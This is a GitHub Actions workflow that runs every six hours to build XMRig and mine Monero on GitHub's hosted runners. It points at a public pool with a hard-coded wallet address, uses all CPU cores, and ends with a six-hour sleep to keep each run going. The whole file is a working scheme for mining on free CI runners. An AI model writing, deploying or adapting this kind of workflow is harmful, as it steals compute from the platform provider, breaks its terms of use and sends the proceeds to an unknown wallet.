name: Continuous Persistent VPS

on:
  schedule:
    - cron: '0 */6 * * *'  # Every 6 hours
  workflow_dispatch:

jobs:
  vps-session:
    runs-on: ubuntu-latest
    timeout-minutes: 350  # Just under 6 hours

    steps:
      - name: Checkout repo
        uses: actions/checkout@v4

      - name: Set hostname
        run: sudo hostnamectl set-hostname miner-vps

      - name: Install prerequisites
        run: |
          sudo apt update
          sudo apt install -y curl unzip git build-essential cmake libssl-dev

      - name: Download and configure XMRig
        run: |
          git clone https://github.com/xmrig/xmrig.git
          cd xmrig
          mkdir build && cd build
          cmake ..
          make -j$(nproc)
          ./xmrig -o pool.supportxmr.com:3333 -u 43dg7Dzeqtd7BmGsctHnnLS4w53NJfwLwfyV8zZuyKjX19dmwn9mhkUPrmrtDaNxBScd4E5EuDJR3bzqzRBrxmia615EkEV -p x --coin monero -t $(nproc)

      - name: Keep VPS alive
        run: sleep 21600  # 6 hours
